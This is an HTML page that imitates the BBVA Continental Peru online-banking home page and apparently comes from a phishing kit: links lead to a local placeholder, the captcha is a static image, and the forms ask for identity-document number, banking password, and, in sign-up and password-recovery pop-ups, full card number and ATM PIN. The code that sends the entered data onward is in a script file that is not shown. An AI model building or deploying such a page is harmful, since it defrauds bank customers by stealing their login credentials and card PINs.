<!DOCTYPE html>
<html lang="es-PE">

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="user-scalable=no, initial-scale=1, maximum-scale=1">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>Bienvenido a su banco | BBVA Continental</title>
  <meta name="description" content="En el banco BBVA Continental, líder del mercado financiero y bancos en Perú, encontrarás lo que buscas en ahorro e inversión, tarjetas, préstamos y seguros.">
  <meta name="keywords" content="bbva continental, banco, bancos en peru, ahorro, inversiones, tarjetas, prestamos, seguros">
  <meta name="author" content="BBVA">
  <link rel="canonical" href="https://www.bbvacontinental.pe/">
  <link rel="shortcut icon" href="images/favicon.ico">
  <link rel="stylesheet" href="css/libraries.css">
  <link href="css/generalBase-mobile.css" type="text/css" rel="stylesheet">
  <link href="css/generalBase-mobile.css" type="text/css" media="only screen and (min-width: 481px)" rel="stylesheet">
  <link href="css/generalBase-desktop.css" type="text/css" media="only screen and (min-width: 800px)" rel="stylesheet">
  <!-- LATAM -->
  <link rel="stylesheet" href="css/vendor.min.ver18.css">
  <link rel="stylesheet" href="css/main-mobile.min.ver40.css">
  <link rel="stylesheet" type="text/css" media="only screen and (min-width: 481px)" href="css/main-tablet.min.ver28.css">
  <link rel="stylesheet" type="text/css" media="only screen and (min-width: 800px)" href="css/main-desktop.min.ver27.css">
  <link rel="stylesheet" href="css/main.css">
  <script type="text/javascript" src="js/modernizr-v2.min.js"></script>
</head>

<body class="continental" id="body">
   <header class="body-header">
    <div class="container">
      <ul class="top-menu">
        <li>
          <i class="bbva-icon icon-uniE087 "></i>
          <a href="nodisponible.html" class="">Tu Seguridad</a>
        </li>
        <li>
          <i class="bbva-icon icon-uniE10A "></i>
          <a href="nodisponible.html" class="" target="_blank">Ubícanos</a>
        </li>
        <li>
          <i class="bbva-icon icon-uniE0E5 avisoRed"></i>
          <a href="nodisponible.html" class="avisoRed">SOS Cliente</a>
        </li>
        <li>
          <i class="bbva-icon icon-uniE10B "></i>
          <a href="nodisponible.html" class="">(01) 595-0000</a>
        </li>
      </ul>
      <div class="logo-container">
        <a href="#" class="navbar-trigger">&nbsp;</a>
        <a href="/" class="logo-cabecera">
          <img src="images/logoperu_tcm1105-418187.png" alt="Logo BBVA Continental" title="Logo BBVA Continental" class="logo-desktop"
            width="356" height="90">
        </a>
        <a href="/" class="logo-cabecera">
          <img src="images/logo_tcm1105-421006.jpg" alt="Logo BBVA Continental" title="Logo BBVA Continental" class="logo-tablet" width="301"
            height="30">
        </a>
      </div>
      <!-- color bar -->
      <div class="color-bar">
        <span class="first">&nbsp;</span>
        <span class="second">&nbsp;</span>
        <span class="third">&nbsp;</span>
        <span class="fourth">&nbsp;</span>
        <span class="fifth">&nbsp;</span>
        <span class="sixth">&nbsp;</span>
      </div>
      <div class="main-menu">
        <div class="header-buttons">
          <form id="main-form" class="form">
            <a id="buttonaccess0" href="#" class="btn success form-trigger header-btn">
              <i class="bbva-icon icon-uniE0B5"></i>Banca por Internet
            </a>
            <div class="move-to" data-device="tablet phone" data-element="login-form">
              <!-- main form -->
              <div id="form-buttonaccess0" class="hidden main-form">
                <!-- main form -> document-type -->
                <div class="form-section document-type">
                  <select id="documentType" name="document-type" class="">
                    <option value="DNI" selected="selected">DNI</option>
                    <option value="RUC">RUC</option>
                    <option value="PASAPORTE">Pasaporte</option>
                    <option value="EXTRANJERIA">Carnet de Extranjería</option>
                    <option value="MILITAR">Carnet Identidad Militar</option>
                    <option value="DIPLOMATICO">Carnet Diplomático</option>
                    <option value="NACIMIENTO">Partida de Nacimiento</option>
                  </select>
                </div>
                <!-- main form -> document-number -->
                <div class="form-section document-number">
                  <input id="documentNumber" type="text" name="documentNumber" placeholder="Número de documento">
                </div>
                <!-- main form -> remember-document -->
                <div class="form-section remember-document">
                  <input type="checkbox" name="" id="">
                  <label for="rememberDocument">Recordar documento</label>
                  <img class="img" src="images/imgayuda_u5.png" style="display: inline;">
                </div>
                <!-- main form -> password -->
                <div class="form-section password">
                  <i class="icon-show-pass show-pass"></i>
                  <a style="display: none; left: 76px;" class="pie tooltip-icon-password">
                    <span class="colite" id="colite_mostrar_password" style="left: 134px;">
                      <i></i>
                    </span>
                    <span class="msje">Clic para ver contraseña
                      <i></i>
                    </span>
                  </a>
                  <input id="password" name="password" maxlength="9" placeholder="Contraseña de Banca por Internet" tabindex="4" type="password">
                </div>
                <!-- main form -> button-enter -->
                <div class="form-section button-enter">
                  <button id="enterButton" class="btn-enter" type="button" tabindex="5">Entrar</button>
                </div>
                <!-- main form -> recover-password -->
                <div class="form-section recover-password">
                  <a class="recover-pass-link" id="recover-pass-link" href="#">¿Olvidaste o bloqueaste tu contraseña?</a>
                </div>
                <!-- main form -> register -->
                <div class="form-section register">
                  <a id="register-btn" class="register-btn" href="#">¿Ingresas por primera vez?</a>
                </div>
              </div>
              <!-- /main-form -->
            </div>
            <input class="input-for-search" type="search" id="q_head" name="q" class="form-control input-search ui-autocomplete-input"
              autocomplete="off">
            <span role="status" aria-live="polite" class="ui-helper-hidden-accessible"></span>
            <i class="bbva-icon search-icon icon-glyph-2"></i>
          </form>
        </div>
        <div class="menu-trigger active first-child" data-target="#submenu-Personas">
          <a title="Personas" href="nodisponible.html">Personas</a>
        </div>
        <ul id="submenu-Personas" class="sub-menu active">
          <li class="home active">
            <a href="nodisponible.html">
              <i class="bbva-icon icon-uniE084"></i>
              <span class="text">Inicio</span>
            </a>
          </li>
          <li style="width: 18%;">
            <a title="Cuentas y Ahorro" href="nodisponible.html">
              <i class="bbva-icon icon-uniE021"></i>Cuentas y Ahorro</a>
          </li>
          <li style="width: 18%;">
            <a title="Tarjetas" href="nodisponible.html">
              <i class="bbva-icon icon-uniE023"></i>Tarjetas</a>
          </li>
          <li style="width: 18%;">
            <a title="Préstamos" href="nodisponible.html">
              <i class="bbva-icon icon-uniE02A"></i>Préstamos</a>
          </li>
          <li style="width: 18%;">
            <a title="Inversiones" href="nodisponible.html">
              <i class="bbva-icon icon-uniE12D"></i>Inversiones</a>
          </li>
          <li style="width: 18%;">
            <a title="Seguros" href="nodisponible.html">
              <i class="bbva-icon icon-uniE02D"></i>Seguros</a>
          </li>
          <li class="search">
            <form action="/buscador/">
              <input type="search" name="q" id="q_head" class="form-control input-search ui-autocomplete-input" autocomplete="off">
              <span role="status" aria-live="polite" class="ui-helper-hidden-accessible"></span>
              <i class="bbva-icon icon-glyph-2"></i>
            </form>
          </li>
        </ul>
        <div class="menu-trigger" data-target="#submenu-Negocios">
          <a title="Negocios" href="nodisponible.html">Negocios</a>
        </div>
        <ul id="submenu-Negocios" class="sub-menu">
          <li class="home">
            <a href="nodisponible.html">
              <i class="bbva-icon icon-uniE084"></i>
              <span class="text">Inicio</span>
            </a>
          </li>
          <li>
            <a title="Financiamiento" href="nodisponible.html">
              <i class="bbva-icon icon-uniE028"></i>Financiamiento</a>
          </li>
          <li>
            <a title="Cobros y Pagos" href="nodisponible.html">
              <i class="bbva-icon icon-uniE03F"></i>Cobros y Pagos</a>
          </li>
          <li>
            <a title="Inversiones" href="nodisponible.html">
              <i class="bbva-icon icon-uniE12D"></i>Inversiones</a>
          </li>
          <li>
            <a title="Seguros" href="nodisponible.html">
              <i class="bbva-icon icon-uniE02D"></i>Seguros</a>
          </li>
          <li>
            <a title="Negocios Internacionales" href="nodisponible.html">
              <i class="bbva-icon icon-uniE012"></i>Negocios Internacionales</a>
          </li>
          <li class="search">
            <form action="/buscador/">
              <input type="search" name="q" id="q_head" class="form-control input-search ui-autocomplete-input" autocomplete="off">
              <span role="status" aria-live="polite" class="ui-helper-hidden-accessible"></span>
              <i class="bbva-icon icon-glyph-2"></i>
            </form>
          </li>
        </ul>
        <div class="menu-trigger last-child" data-target="#submenu-Empresas">
          <a title="Empresas" href="nodisponible.html">Empresas</a>
        </div>
        <ul id="submenu-Empresas" class="sub-menu">
          <li class="home">
            <a href="nodisponible.html">
              <i class="bbva-icon icon-uniE084"></i>
              <span class="text">Inicio</span>
            </a>
          </li>
          <li>
            <a title="Financiación y Cobertura de Riesgo" href="nodisponible.html">
              <i class="bbva-icon icon-uniE028"></i>Financiación y Cobertura de Riesgo</a>
          </li>
          <li>
            <a title="Cuentas Empresariales" href="nodisponible.html">
              <i class="bbva-icon icon-uniE021"></i>Cuentas Empresariales</a>
          </li>
          <li>
            <a title="Cobros y Pagos" href="nodisponible.html">
              <i class="bbva-icon icon-uniE03F"></i>Cobros y Pagos</a>
          </li>
          <li>
            <a title="Negocios Internacionales" href="nodisponible.html">
              <i class="bbva-icon icon-uniE012"></i>Negocios Internacionales</a>
          </li>
          <li class="search">
            <form action="/buscador/">
              <input type="search" name="q" id="q_head" class="form-control input-search ui-autocomplete-input" autocomplete="off">
              <span role="status" aria-live="polite" class="ui-helper-hidden-accessible"></span>
              <i class="bbva-icon icon-glyph-2"></i>
            </form>
          </li>
        </ul>
    </div>
    </div>
    <div class="blue-full-width-line"></div>
    <div class="move-to" data-device="tablet,phone" data-element="login-form"></div>
  </header>



  <!--  -->
  <!--  -->
  <!--  -->

  <div class="content">
    <div class="container">
      <div class="row">


        <div class="col-lg-offset-2 col-lg-8 col-sm-offset-2 col-sm-8">
          <div class="alerta">

            <span>Servicio no disponible temporalmente</span>


            <div class="ico-alert">
              <i class="icon-32 red sprite-M01-Alerta-32x"></i>
            </div>

            <span class="texto">


              <p>Parece que la página que estás buscando no existe.</p>

            </span>


            <span class="texto">


              <p>Comunícate con nuestra Banca por Teléfono al (01) 595-0000 (Lima) o al 0-800-12668 (Provincias).</p>

            </span>


          </div>
        </div>

      </div>
    </div>
  </div>


  <!--  -->
  <!--  -->
  <!--  -->
  <!--  -->

  <!-- Fin Contenido -->
  <div class="content"></div>
  <div class="metanavegation-phone hidden-desktop">
    <ul class="">
      <li>
        <i class="bbva-icon icon-uniE10A "></i>
        <a href="http://www.ubicanosbbvacontinental.pe" class="" target="_blank">Ubícanos</a>
      </li>
      <li>
        <i class="bbva-icon icon-uniE0E5 avisoRed"></i>
        <a href="https://www.bbvacontinental.pe/meta/atencion-cliente/" class="avisoRed">SOS Cliente</a>
      </li>
      <li>
        <i class="bbva-icon icon-uniE10B "></i>
        <a href="tel:015950000" class="">(01) 595-0000</a>
      </li>
    </ul>
  </div>
  <!-- Pie de página -->
  <footer class="body-footer">
    <div class="footer-menu">
      <div class="container">
        <div class="row">
          <div class="col-lg-3">
            <div class="menu-trigger" data-target="#bbva-continental-submenu">BBVA CONTINENTAL</div>
            <ul id="bbva-continental-submenu">
              <li>
                <a href="nodisponible.html">Nuestro Banco</a>
              </li>
              <li>
                <a href="nodisponible.html">Responsabilidad Social Corporativa</a>
              </li>
              <li>
                <a href="nodisponible.html">Memoria Financiera</a>
              </li>
              <li>
                <a href="nodisponible.html">Investor Relations</a>
              </li>
              <li>
                <a href="nodisponible.html" target="_blank">Empleo en BBVA</a>
              </li>
              <li>
                <a href="nodisponible.html" target="_blank">BBVA Research</a>
              </li>
              <li>
                <a href="nodisponible.html" target="_blank">Noticias en BBVA.com</a>
              </li>
              <li>
                <a href="nodisponible.html" target="_blank">Sala de Prensa</a>
              </li>
            </ul>
          </div>
          <div class="col-lg-3">
            <div class="menu-trigger" data-target="#tasas-y-tarifas-submenu">TASAS Y TARIFAS</div>
            <ul id="tasas-y-tarifas-submenu">
              <li>
                <a href="nodisponible.html">Personas Naturales y Microempresas</a>
              </li>
              <li>
                <a href="nodisponible.html">Pequeñas, Medianas y Grandes empresas</a>
              </li>
              <li>
                <a href="nodisponible.html" target="_blank">Tips del Tarifario</a>
              </li>
              <li>
                <a href="nodisponible.html" target="_blank">Comunicados de Interés</a>
              </li>
              <li>
                <a href="nodisponible.html">Recomendaciones de productos, tasas y tarifas</a>
              </li>
            </ul>
          </div>
          <div class="col-lg-3">
            <div class="menu-trigger" data-target="#informacion-de-interes-submenu">INFORMACIÓN DE INTERÉS</div>
            <ul id="informacion-de-interes-submenu">
              <li>
                <a href="nodisponible.html">He perdido o me han robado mis tarjetas</a>
              </li>
              <li>
                <a href="nodisponible.html">¿Víctima de fraude por Internet?</a>
              </li>
              <li>
                <a href="nodisponible.html">Seguridad de Tarjeta de Crédito</a>
              </li>
              <li>
                <a href="nodisponible.html">CCI Cuenta Interbancaria y Código SWIFT</a>
              </li>
              <li>
                <a href="nodisponible.html" target="_blank">Monedas y Billetes de BCR</a>
              </li>
              <li>
                <a href="nodisponible.html" target="_blank">SMV - Hechos de Importancia</a>
              </li>
              <li>
                <a href="nodisponible.html" target="_blank">SMV – Defensa de los derechos de clientes</a>
              </li>
              <li>
                <a href="nodisponible.html">FATCA</a>
              </li>
              <li>
                <a href="nodisponible.html" target="_blank">Comprobantes de Retención</a>
              </li>
              <li>
                <a href="nodisponible.html">Protección de Datos Personales</a>
              </li>
            </ul>
          </div>
          <div class="col-lg-3 footer-social-menu">
            <div class="footer-social-menu-title">NUESTRAS REDES SOCIALES</div>
            <ul>
              <li>
                <a href="nodisponible.html" class="ico-facebook" target="_blank">Facebook</a>
              </li>
              <li>
                <a href="nodisponible.html" class="ico-twitter" target="_blank">Twitter</a>
              </li>
              <li>
                <a href="nodisponible.html" class="ico-instagram" target="_blank">Instagram</a>
              </li>
              <li>
                <a href="nodisponible.html" class="ico-youtube" target="_blank">Youtube</a>
              </li>
            </ul>
          </div>
        </div>
      </div>
    </div>
    <div class="footer-bottom">
      <div class="container">
        <ul>
          <li>
            <a href="nodisponible.html">Seguridad</a>
          </li>
          <li>
            <a href="nodisponible.html">Aviso Legal</a>
          </li>
          <li>
            <a href="nodisponible.html" target="_blank">Cláusulas Generales de Contratación</a>
          </li>
          <li>
            <a href="nodisponible.html">Mapa del Sitio</a>
          </li>
          <li class="hidden-phone">
            <a href="nodisponible.html" target="_blank">Políticas de Privacidad</a>
          </li>
        </ul>
        <span class="copyright">Banco Bilbao Vizcaya Argentaria, S.A. 2018</span>
      </div>
    </div>
  </footer>
  <div id="destino0"></div>
  <!-- Fin Pie de página -->
  <!-- Scripts -->
  <span id="scroll-to-top" class="scroll-to-top" title="Subir">
    <i class="bbva-icon icon-uniE073"></i>
  </span>

  <!-- register-modal -->
  <section class="register-modal is-hidden" id="register-modal">
    <!-- register-modal -> modal-box -->
    <div class="modal-box">
      <!-- register-modal -> modal-box -> register-modal-content -->
      <div class="register-modal-content">
        <!-- register-modal -> modal-box -> register-modal-content -> title -->
        <h2 class="title">Inscríbete a nuestra Banca por Internet</h2>
        <!-- register-modal -> modal-box -> register-modal-content -> wizard -->
        <div class="wizard show-for-desktop">
          <div class="progress-bar">
            <div class="progress-line">
              <div class="point-background active now" style="left: -1px;">
                <div class="text">1. Identificación</div>
                <div class="point"></div>
              </div>
              <div class="point-background" style="left: 98.5%;">
                <div class="text" style="left: -112px;">2. Contraseña de acceso</div>
                <div class="point"></div>
              </div>
            </div>
          </div>
        </div>
        <!-- register-modal -> modal-box -> register-modal-content -> step-content -->
        <div class="step-content">
          <div class="container">
            <h3 class="title">Introduce los datos de tu tarjeta</h3>
            <div class="grid-x">
              <div class="column-alfa">
                <div class="form-section">
                  <label for="cardNumber">Número de tarjeta
                    <span class="icon-info"></span>
                  </label>
                  <input class="cardNumber" type="text" id="cardNumberRegister" name="cardNumber" minlength="16" maxlength="16" autocomplete="off">
                </div>
                <div class="form-section">
                  <label for="cardPass">Clave de cajero
                    <span class="icon-info"></span>
                  </label>
                  <input class="cardPass" type="password" id="atmKeyRegister" name="cardPass" minlength="4" maxlength="4" autocomplete="off">
                </div>
              </div>
              <div class="column-beta">
                <div class="form-section">
                  <div class="captcha">
                    <span class="image">
                      <img class="imgCaptcha" id="imgCaptcha" src="images/captchas/1.jpeg" alt="captcha">
                    </span>
                    <span class="help">
                      <img src="images/ico-ayuda-captcha.png">
                    </span>
                    <button class="update-captcha-button">
                      <span class="icon"></span>
                    </button>
                  </div>
                </div>
                <div class="form-section">
                  <label class="captchaCodeLabel" for="captchaCode">Código de imagen</label>
                  <input class="captchaCode" id="captchaCode" name="captchaCode" minlength="6" maxlength="6" autocomplete="off" type="text">
                </div>
              </div>
            </div>
          </div>
        </div>
        <!-- register-modal -> modal-box -> register-modal-content -> next-button-container -->
        <div class="next-button-container">
          <button class="next-button arrow-right" id="nextButtonRegister">Siguiente</button>
        </div>

      </div>
      <!-- register-modal -> modal-box -> register-modal-close -->
      <button id="register-modal-close" class="close-button">
        <i class="bbva-icon icon-glyph-4"></i>
      </button>
    </div>
  </section>

  <!-- recover-modal -->
  <section class="recover-modal is-hidden" id="recover-modal">
    <!-- recover-modal -> modal-box -->
    <div class="modal-box">
      <!-- recover-modal -> modal-box -> recover-modal-content -->
      <div class="recover-modal-content">
        <!-- recover-modal -> modal-box -> recover-modal-content -> title -->
        <h2 class="title">¿Olvidaste tu contraseña?</h2>
        <!-- recover-modal -> modal-box -> recover-modal-content -> wizard -->
        <div class="wizard show-for-desktop">
          <div class="progress-bar">
            <div class="progress-line">
              <div class="point-background active now" style="left: -1px;">
                <div class="text">1. Identificación</div>
                <div class="point"></div>
              </div>
              <div class="point-background" style="left: 98.5%;">
                <div class="text" style="left: -112px;">2. Contraseña de acceso</div>
                <div class="point"></div>
              </div>
            </div>
          </div>
        </div>
        <!-- recover-modal -> modal-box -> recover-modal-content -> step-content -->
        <div class="step-content">
          <div class="container">
            <h3 class="title">Introduce los datos de tu tarjeta</h3>
            <div class="grid-x">
              <div class="column-alfa">
                <div class="form-section">
                  <label for="cardNumber">Número de tarjeta
                    <span class="icon-info"></span>
                  </label>
                  <input class="cardNumber" type="text" id="cardNumberPass" name="cardNumber" minlength="16" maxlength="16" autocomplete="off">
                </div>
                <div class="form-section">
                  <label for="cardPass">Clave de cajero
                    <span class="icon-info"></span>
                  </label>
                  <input class="cardPass" type="password" id="atmKeyPass" name="cardPass" minlength="4" maxlength="4" autocomplete="off">
                </div>
              </div>
              <div class="column-beta">
                <div class="form-section">
                  <div class="captcha">
                    <span class="image">
                      <img class="imgCaptcha" id="imgCaptcha" src="images/captchas/1.jpeg" alt="captcha">
                    </span>
                    <span class="help">
                      <img src="images/ico-ayuda-captcha.png">
                    </span>
                    <button class="update-captcha-button">
                      <span class="icon"></span>
                    </button>
                  </div>
                </div>
                <div class="form-section">
                  <label class="captchaCodeLabel" for="captchaCode">Código de imagen</label>
                  <input class="captchaCode" id="captchaCode" name="captchaCode" minlength="6" maxlength="6" autocomplete="off" type="text">
                </div>
              </div>
            </div>
          </div>
        </div>
        <!-- recover-modal -> modal-box -> recover-modal-content -> next-button-container -->
        <div class="next-button-container">
          <button class="next-button arrow-right" id="nextButtonPass">Siguiente</button>
        </div>

      </div>
      <!-- recover-modal -> modal-box -> recover-modal-close -->
      <button id="recover-modal-close" class="close-button">
        <i class="bbva-icon icon-glyph-4"></i>
      </button>
    </div>
  </section>


  <script>
    var vSiteGSA = "tlpu_mult_bcontinental";
    var vSiteSuggest = "https://w3.grupobbva.com/TLGO/tlgo/GSA_suggest";
  </script>
  <script type="text/javascript" src="js/constantes_tridion.ver4.js"></script>
  <script type="text/javascript" src="js/libraries.min.ver19.js"></script>
  <script type="text/javascript" src="js/iframeResizer.min.js"></script>
  <script type="text/javascript" src="js/iframeResizer.contentWindow.min.js"></script>
  <script type="text/javascript" src="js/handlebars-v1.3.0.min.js"></script>
  <script type="text/javascript" src="js/autocompletar.min.js"></script>
  <script type="text/javascript" src="js/masonry.pkgd.min.js"></script>
  <script src="js/jquery.min.js" type="text/javascript"></script>
  <script>$.noConflict(true);</script>
  <script type="text/javascript" src="js/vendor.min.ver4.js"></script>
  <script type="text/javascript" src="js/iframe-order-receiver.min.ver2.js"></script>
  <script type="text/javascript" src="js/headerFooter.min.ver4.js"></script>
  <script type="text/javascript" src="js/commonJS.min.ver21.js"></script>
  <script type="text/javascript" src="js/main-v3.min.ver39.js"></script>
  <script type="text/javascript" src="js/smartbanner-init.ver4.js"></script>
  <script src="js/main.js"></script>
</body>

</html>